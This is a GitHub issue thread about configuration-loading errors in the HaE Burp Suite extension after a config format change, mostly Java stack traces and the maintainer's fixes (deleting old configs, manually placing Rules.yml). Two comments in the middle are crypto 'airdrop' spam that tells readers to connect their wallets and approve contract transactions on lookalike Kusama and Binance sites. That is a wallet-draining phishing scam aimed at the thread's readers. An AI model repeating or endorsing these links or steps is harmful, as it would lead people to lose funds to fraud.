### ISSUE TITLE
关于加载报错问题，请先看这里

### ISSUE THREAD

**Issue by gh0stkey** [gh0stkey/HaE#130]
由于2.4.8版本之后调整了配置文件的结构体和命名，因此建议2.4.7之前的用户先保存自己自定义的规则（如果没有的可以省略这一步），然后删除原配置文件（Config.yml、Setting.yml），最后重新加载HaE。

Linux/Mac用户的配置文件目录：`~/.config/HaE/`
Windows用户的配置文件目录：`%USERPROFILE%/.config/HaE/`

**Comment by JaveleyQAQ** [comment]
我爱你key超市我

**Comment by Heresy-dd** [comment]
java.lang.Exception: Extension class is not a recognized type
	at burp.ao0.M(Unknown Source)
	at burp.ao0.l(Unknown Source)
	at burp.wf8.t(Unknown Source)
	at burp.cci.o(Unknown Source)
	at burp.can.lambda$panelLoaded$0(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:577)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:317)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)

**Comment by JaveleyQAQ** [comment]
关于内置配置，不考虑内网离线吗？0.0 发现不联网还得手动创建rules才能加载

**Comment by JaveleyQAQ** [comment]
> java.lang.Exception: Extension class is not a recognized type at burp.ao0.M(Unknown Source) at burp.ao0.l(Unknown Source) at burp.wf8.t(Unknown Source) at burp.cci.o(Unknown Source) at burp.can.lambda$panelLoaded$0(Unknown Source) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:577) at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:317) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)

确保删除了%USERPROFILE%/.config/HaE/   系统可联网，以及java版本大于8+

**Comment by gh0stkey** [comment]
> 关于内置配置，不考虑内网离线吗？0.0 发现不联网还得手动创建rules才能加载

离线的情况下还是建议创建文件夹然后复制过去的

**Comment by gh0stkey** [comment]
如果初始化加载失败，可能是网络问题，可以尝试手动下载官方规则库`https://raw.githubusercontent.com/gh0stkey/HaE/gh-pages/Rules.yml`，放至配置目录下。

**Comment by Heresy-dd** [comment]
确实是网络问题，但是代理已经开了全局了，最后解决办法是手动复制粘贴

**Comment by gh0stkey** [comment]
可能部分地区这个节点被BAN掉了：https://cdn.jsdelivr.net/gh/gh0stkey/HaE@gh-pages/Rules.yml

**Comment by secretofme** [comment]
内网配置如何实现，复制了规则文件夹过去还是报错
java.lang.Exception: Extension class is not a recognized type
	at burp.onq.k(Unknown Source)
	at burp.onq.S(Unknown Source)
	at burp.ip3.O(Unknown Source)
	at burp.k47.u(Unknown Source)
	at burp.e0u.lambda$panelLoaded$0(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
	at java.base/java.lang.Thread.run(Thread.java:833)

**Comment by gh0stkey** [comment]
确保你复制的正确吧，这个报错没别的原因：Rules.yml以及Config.yml都是争取的。

**Comment by Cuerz** [comment]
java.lang.NullPointerException: Cannot invoke "java.util.Map.get(Object)" because "rulesMap" is null
	at burp.config.ConfigLoader.getRules(ConfigLoader.java:117)
	at burp.config.ConfigLoader.<init>(ConfigLoader.java:44)
	at burp.BurpExtender.registerExtenderCallbacks(BurpExtender.java:36)
	at burp.Zexj.Z_(Unknown Source)
	at burp.Ztco.ZM(Unknown Source)
	at burp.Ztcm.lambda$initialiseOnNewThread$0(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
	at java.base/java.lang.Thread.run(Thread.java:842)
jdk17+burp2023.10.2 加载插件报错

**Comment by gh0stkey** [comment]
@saoshao 哥们，8G的电脑，你Burp最新版本可能运行一段时间也会卡死

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by clingerxiangdingdang** [comment]
" because "rulesMap" is null

**Comment by 1164792343** [comment]
为什么我添加报错啊，以前没有添加过这个插件

**Comment by gh0stkey** [comment]
@1164792343 你的报错信息我看了，你自己找下问题吧，跟HaE没有任何关系

**Comment by yinka5521** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

**Comment by ordshine** [comment]
java.lang.NullPointerException: Cannot invoke "java.util.Map.get(Object)" because "rulesMap" is null
	at burp.config.ConfigLoader.getRules(ConfigLoader.java:117)
	at burp.config.ConfigLoader.<init>(ConfigLoader.java:44)
	at burp.BurpExtender.registerExtenderCallbacks(BurpExtender.java:39)
	at burp.Zcp.Zi(Unknown Source)
	at burp.Zu1y.ZY(Unknown Source)
	at burp.Zu11.lambda$initialiseOnNewThread$0(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
	at java.base/java.lang.Thread.run(Thread.java:833)

**Comment by 0x076** [comment]
内网配置如何实现，复制了规则文件夹过去还是报错
   JAVA版本17

java.net.UnknownHostException: cdn.jsdelivr.net
	at burp.Zapa.Zn(Unknown Source)
	at burp.Zzq_.Zn(Unknown Source)
	at burp.Zap0.Z_(Unknown Source)
	at burp.Zpxj.Z_(Unknown Source)
	at burp.Zag.Z_(Unknown Source)
	at burp.Zax3.Z_(Unknown Source)
	at burp.Z_28.Zr(Unknown Source)
	at burp.Zpmu.Zo(Unknown Source)
	at burp.Zpmw.Zo(Unknown Source)
	at burp.Zpjl.ZC(Unknown Source)
	at burp.Zbo4.Zj(Unknown Source)
	at burp.Zbo4.Zs(Unknown Source)
	at burp.Zqke.ZL(Unknown Source)
	at burp.Zqke.sendRequest(Unknown Source)
	at burp.Zqke.sendRequest(Unknown Source)
	at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77)
	at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.base/java.lang.reflect.Method.invoke(Method.java:568)
	at burp.Zz52.invoke(Unknown Source)
	at jdk.proxy2/jdk.proxy2.$Proxy24.sendRequest(Unknown Source)
	at burp.Zqxg.makeHttpRequest(Unknown Source)
	at burp.Za5i.makeHttpRequest(Unknown Source)
	at burp.Zpzr.makeHttpRequest(Unknown Source)
	at burp.Zpzr.makeHttpRequest(Unknown Source)
	at burp.Zx17.makeHttpRequest(Unknown Source)
	at burp.rule.utils.RuleTool.lambda$getRulesFromSite$0(RuleTool.java:26)
	at java.base/java.lang.Thread.run(Thread.java:833)
java.lang.RuntimeException: java.lang.RuntimeException: java.net.UnknownHostException: cdn.jsdelivr.net
	at burp.Zzs1.ZF(Unknown Source)
	at burp.Zbz5.ZB(Unknown Source)
	at burp.Zqxg.makeHttpRequest(Unknown Source)
	at burp.Za5i.makeHttpRequest(Unknown Source)
	at burp.Zpzr.makeHttpRequest(Unknown Source)
	at burp.Zpzr.makeHttpRequest(Unknown Source)
	at burp.Zx17.makeHttpRequest(Unknown Source)
	at burp.rule.utils.RuleTool.lambda$getRulesFromSite$0(RuleTool.java:26)
	at java.base/java.lang.Thread.run(Thread.java:833)
java.lang.NullPointerException: Cannot invoke "java.util.Map.get(Object)" because "rulesMap" is null
	at burp.config.ConfigLoader.getRules(ConfigLoader.java:117)
	at burp.config.ConfigLoader.<init>(ConfigLoader.java:44)
	at burp.BurpExtender.registerExtenderCallbacks(BurpExtender.java:37)
	at burp.Zsxi.Za(Unknown Source)
	at burp.Zplm.ZV(Unknown Source)
	at burp.Zplt.lambda$initialiseOnNewThread$0(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
	at java.base/java.lang.Thread.run(Thread.java:833)

**Comment by ordshine** [comment]
> " because "rulesMap" is null

这个有解决办法了吗？

**Comment by gh0stkey** [comment]
> > " because "rulesMap" is null
> 
> 这个有解决办法了吗？

你的问题是规则配置的问题，自己手动下载放至配置文件目录下，谢谢。

**Comment by gh0stkey** [comment]
> 内网配置如何实现，复制了规则文件夹过去还是报错 JAVA版本17
> 
> java.net.UnknownHostException: cdn.jsdelivr.net at burp.Zapa.Zn(Unknown Source) at burp.Zzq_.Zn(Unknown Source) at burp.Zap0.Z_(Unknown Source) at burp.Zpxj.Z_(Unknown Source) at burp.Zag.Z_(Unknown Source) at burp.Zax3.Z_(Unknown Source) at burp.Z_28.Zr(Unknown Source) at burp.Zpmu.Zo(Unknown Source) at burp.Zpmw.Zo(Unknown Source) at burp.Zpjl.ZC(Unknown Source) at burp.Zbo4.Zj(Unknown Source) at burp.Zbo4.Zs(Unknown Source) at burp.Zqke.ZL(Unknown Source) at burp.Zqke.sendRequest(Unknown Source) at burp.Zqke.sendRequest(Unknown Source) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.base/java.lang.reflect.Method.invoke(Method.java:568) at burp.Zz52.invoke(Unknown Source) at jdk.proxy2/jdk.proxy2.$Proxy24.sendRequest(Unknown Source) at burp.Zqxg.makeHttpRequest(Unknown Source) at burp.Za5i.makeHttpRequest(Unknown Source) at burp.Zpzr.makeHttpRequest(Unknown Source) at burp.Zpzr.makeHttpRequest(Unknown Source) at burp.Zx17.makeHttpRequest(Unknown Source) at burp.rule.utils.RuleTool.lambda$getRulesFromSite$0(RuleTool.java:26) at java.base/java.lang.Thread.run(Thread.java:833) java.lang.RuntimeException: java.lang.RuntimeException: java.net.UnknownHostException: cdn.jsdelivr.net at burp.Zzs1.ZF(Unknown Source) at burp.Zbz5.ZB(Unknown Source) at burp.Zqxg.makeHttpRequest(Unknown Source) at burp.Za5i.makeHttpRequest(Unknown Source) at burp.Zpzr.makeHttpRequest(Unknown Source) at burp.Zpzr.makeHttpRequest(Unknown Source) at burp.Zx17.makeHttpRequest(Unknown Source) at burp.rule.utils.RuleTool.lambda$getRulesFromSite$0(RuleTool.java:26) at java.base/java.lang.Thread.run(Thread.java:833) java.lang.NullPointerException: Cannot invoke "java.util.Map.get(Object)" because "rulesMap" is null at burp.config.ConfigLoader.getRules(ConfigLoader.java:117) at burp.config.ConfigLoader.(ConfigLoader.java:44) at burp.BurpExtender.registerExtenderCallbacks(BurpExtender.java:37) at burp.Zsxi.Za(Unknown Source) at burp.Zplm.ZV(Unknown Source) at burp.Zplt.lambda$initialiseOnNewThread$0(Unknown Source) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539) at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635) at java.base/java.lang.Thread.run(Thread.java:833)

麻烦认真阅读README：`您也可以选择将配置文件存放在HaE Jar包的同级目录下的/.config/HaE/中，以便于离线携带。`

**Comment by 1164792343** [comment]
为什么我下载的解压后没jar包啊

**Comment by ppofp** [comment]
java.lang.NullPointerException: Cannot invoke "java.util.Map.get(Object)" because "rulesMap" is null
	at burp.config.ConfigLoader.getRules(ConfigLoader.java:117)
	at burp.config.ConfigLoader.<init>(ConfigLoader.java:44)
	at burp.BurpExtender.registerExtenderCallbacks(BurpExtender.java:37)
	at burp.Zfyq.ZA(Unknown Source)
	at burp.Zmwp.Zk(Unknown Source)
	at burp.Zmw7.lambda$initialiseOnNewThread$0(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
	at java.base/java.lang.Thread.run(Thread.java:840)

**Comment by uustr** [comment]
关于导入Hae插件时报的错误，jdk版本18，应该如何解决
java.lang.NullPointerException: Cannot invoke "java.util.Map.get(Object)" because "rulesMap" is null
	at burp.config.ConfigLoader.getRules(ConfigLoader.java:117)
	at burp.config.ConfigLoader.<init>(ConfigLoader.java:44)
	at burp.BurpExtender.registerExtenderCallbacks(BurpExtender.java:37)
	at burp.Zu74.ZI(Unknown Source)
	at burp.Zhoe.ZZ(Unknown Source)
	at burp.Zhod.lambda$initialiseOnNewThread$0(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:572)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:317)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)
	at java.base/java.lang.Thread.run(Thread.java:1583)
